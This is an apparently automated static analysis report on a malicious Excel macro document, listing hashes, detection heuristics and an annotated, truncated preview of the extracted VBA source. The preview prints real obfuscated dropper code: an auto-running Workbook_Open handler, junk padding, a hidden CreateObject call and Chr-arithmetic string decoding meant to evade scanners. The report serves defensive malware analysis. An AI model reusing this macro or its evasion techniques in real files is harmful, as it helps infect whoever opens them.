Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 077e8187752ae132…

MALICIOUS

Office (OLE)

52.5 KB Created: 2018-09-09 22:27:32 Authoring application: Microsoft Excel First seen: 2019-04-18
MD5: 317840e9f376d6bc77f2cfb54f5cd38d SHA-1: 713c12b37ea5d4ebaefbda582651a81a94eafcb5 SHA-256: 077e8187752ae1321cbb896609a796375590a5c060ffbbae5391266be5ddd676
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Workbook_Open event handler, which runs automatically when the workbook is opened and is a common technique for initial execution. The macro code is heavily obfuscated — for example, API names are reassembled from split string literals — which indicates malicious intent. The primary goal appears to be downloading and executing a secondary payload, though the specific URL or mechanism cannot be extracted directly from the obfuscated code provided.

Heuristics 6

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This heuristic catches documents whose macro exists only as p-code, or whose source extraction failed, so that no visible VBA source is available.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11768 bytes
SHA-256: 7e782dbff70003b921fd5f077f6d1586ec6c835c035d8b0533ab43cfbcf4abe7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
' Auto-execution entry point: VBA invokes this handler when the workbook is
' opened (macros enabled). The only statement that does any work at runtime is
' the call on the next line; the rest of the body is inert padding.
x1RbJPD.YqYK8SL91e4PUszuZpw_
' Calls a member of the "x1RbJPD" module. That member is not in the visible
' portion of the extracted source (the preview is truncated), so presumably
' the CreateObject / string-decoding logic flagged by the heuristics lives
' there — confirm against the full extraction.
'
' Every While/Wend below compares two unequal integer constants, so the loop
' body is never entered; the Dim statements declare names that are never
' referenced anywhere in the visible source. This is consistent with
' junk-code padding used to bloat and obscure the macro, not functional logic.
While 20 = 37
Dim spUxIM_V18d9EN As Boolean
Wend
Dim FRej7kjH4m As Worksheet
While 1 = 46
Dim qpJaJjjur5sU As Boolean
Wend
Dim kAtNzG3A4IFzsb4 As Worksheet
While 9 = 31
Dim EybHfZJbg35 As Boolean
Wend
Dim oW4LWSHuqczru As Worksheet
While 4 = 54
Dim bO3rfhTrqod As Boolean
Wend
Dim NvL4YhKU4adF As Worksheet

While 23 = 40
Dim quwp7uZOFpoO As Boolean
Wend
Dim ga58gK8rXPHf5 As Worksheet
While 6 = 42
Dim P4mUz_uvAtumu6M As Boolean
Wend
Dim MxhE7V7mMwrcvq As Worksheet
While 18 = 36
Dim YlOuEcektzncuZ As Boolean
Wend
Dim IL3ZAcIaiZ As Worksheet
While 26 = 48
Dim dSPYgGf9Dj As Boolean
Wend
Dim Fd2nbqlCrZbjf As Worksheet
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "x1RbJPD"
' Module-level state for "x1RbJPD". Identifiers are randomised; the roles
' below are taken from how each variable is used further down in the module.
'
' Assigned later from a chain of Chr(a - b) calls, i.e. the string is built
' character-by-character from arithmetic so that no readable literal appears
' in the source. The visible arithmetic evaluates to "bin.base64", which,
' together with the createElement call and the base64-like blobs reported
' above, is consistent with MSXML-style base64 decoding — confirm from the
' full source.
Dim feevJpISxli8fi7xic_RJmnZijSGj39E7mYfMx_dG8L8FMueRqLsxOw3zDKiUAs5lc_2HZiuXdIKYpSTywx3oOPqzfoIkdGENQUmL2V2FZTS_jcIt1thLyNVKQBltY As String
' Passed to CreateObject(...) as the ProgID. Its value is not set anywhere in
' the visible portion of the source (preview truncated), so the type of the
' created object cannot be confirmed from here.
Dim FYKPlFDbMNrx7UDedMMqSfUDqJlL7q_JxWJSS2sgaKsamQD79AJbMumiDFiZdzeeIg_hItKkcpOGw3ZYEoM5fl7BtjOKRRBjpLQEPevMyh As String
' Not referenced in the visible portion of the source.
Dim hKdyKXw9AlZSJQCYSICEuAgiZCI6ACRVXFhKoFM5tPBN3FFAbh_ViCRfn4XHNz88SC5CsztL6FUc9QoR5GcaC5wTwBgtq_p4RD5zJDQlwvZaqyfUNEMEUe5WOj As String
' Not referenced in the visible portion of the source.
Dim e8iJzRqVYwh1CwGL8C6rNRGg1oe8EXFuTIJiB3wvT5BkQHOIucZM6vnLyBRJvsPAowe3lhIDOIVROeNrYULk73xgd7t_jl9knA6clUgLSV8uYT6Rvj As Integer

 Function b_4PbQf8BywkINKLqGdpyCrAugugW19d3vxXmzDpglDn_CRbYz_R84pYQ2e(kbn_yCU7lAVESmxBnj3M_cCawL6PdWumQVQsfIVnfo7qVEARCgopab)
While 24 = 36
Dim klqpS_7akTA As Boolean
Wend
Dim fKNBI4p1PH1 As Worksheet
While 8 = 40
Dim DNbyfoYc9C7MDI1 As Boolean
Wend
Dim fpXKTgMDxC7_ As Worksheet

 Dim Vg8NhrkJCb9ajMM2ORKviC_nN8YOkmX_ccPW5oyIZ7Vi7SJR6kGdONXRgS_iRThXC48F7y6ibBTkpYp5wES_e3xND7zkoO1EX7eCUDUEngAM3wlGlDvKAh3I_rB99T3LJNLr3lirtLT72jTPTq8
While 22 = 53
Dim f2WELzshbMd As Boolean
Wend
Dim cQBGT8i7J1QV9aD As Worksheet
While 20 = 30
Dim xRyImvhi2kk6sV As Boolean
Wend
Dim SkXQK44RY2EN_ As Worksheet


   Dim iPSoCQ_of8C1HwJq_yrcCjAu7aFAKgeam545X2BHYC6uvfJdWwbB
While 14 = 35
Dim vLNdWmGBZrQjq5q As Boolean
Wend
Dim HesAyizN2DwgId As Worksheet
While 2 = 45
Dim CWpvUlELRkT33Fq As Boolean
Wend
Dim c9KI3G_Yd58VY As Worksheet
   
While 7 = 41
Dim jE8ffuMK_HTe As Boolean
Wend
Dim YfqMN7UtVR As Worksheet
While 12 = 30
Dim g7T_x88KzW As Boolean
Wend
Dim OokLlwUG2ebz1m As Worksheet
 Set iPSoCQ_of8C1HwJq_yrcCjAu7aFAKgeam545X2BHYC6uvfJdWwbB = CreateObject(FYKPlFDbMNrx7UDedMMqSfUDqJlL7q_JxWJSS2sgaKsamQD79AJbMumiDFiZdzeeIg_hItKkcpOGw3ZYEoM5fl7BtjOKRRBjpLQEPevMyh)
While 2 = 37
Dim bkWJN7klCPg As Boolean
Wend
Dim AJf6OLxQ7Ot As Worksheet
While 22 = 41
Dim djakL11zqEqf As Boolean
Wend
Dim Liv63umkTokkyJk As Worksheet
   feevJpISxli8fi7xic_RJmnZijSGj39E7mYfMx_dG8L8FMueRqLsxOw3zDKiUAs5lc_2HZiuXdIKYpSTywx3oOPqzfoIkdGENQUmL2V2FZTS_jcIt1thLyNVKQBltY = Chr(339 - 241) & Chr(143 - 38) & Chr(368 - 258) & Chr(322 - 276) & Chr(344 - 246) & Chr(483 - 386) & Chr(257 - 142) & Chr(329 - 228) & Chr(264 - 210) & Chr(100 - 48)
While 25 = 38
Dim Qmg3Wrp2jw As Boolean
Wend
Dim UWtKYy4c9soZ1X As Worksheet
While 20 = 31
Dim JlGiy9yuANhK As Boolean
Wend
Dim IKRweqKHfV2Y4 As Worksheet
  Set Vg8NhrkJCb9ajMM2ORKviC_nN8YOkmX_ccPW5oyIZ7Vi7SJR6kGdONXRgS_iRThXC48F7y6ibBTkpYp5wES_e3xND7zkoO1EX7eCUDUEngAM3wlGlDvKAh3I_rB99T3LJNLr3lirtLT72jTPTq8 = iPSoCQ_of8C1HwJq_yrcCjAu7aFAKgeam545X2BHYC6uvfJdWwbB.createElement("I4VC7GToF7Z5uN")
While 28 = 51
Dim ypFya6zvHqujFC As Boolean
Wend
Dim k8iVdlMnrIKL As Worksheet
While 11 = 33
Dim Nr1xsrn9Qq6 As Boolean
Wend
Dim iRqY_d
... (truncated)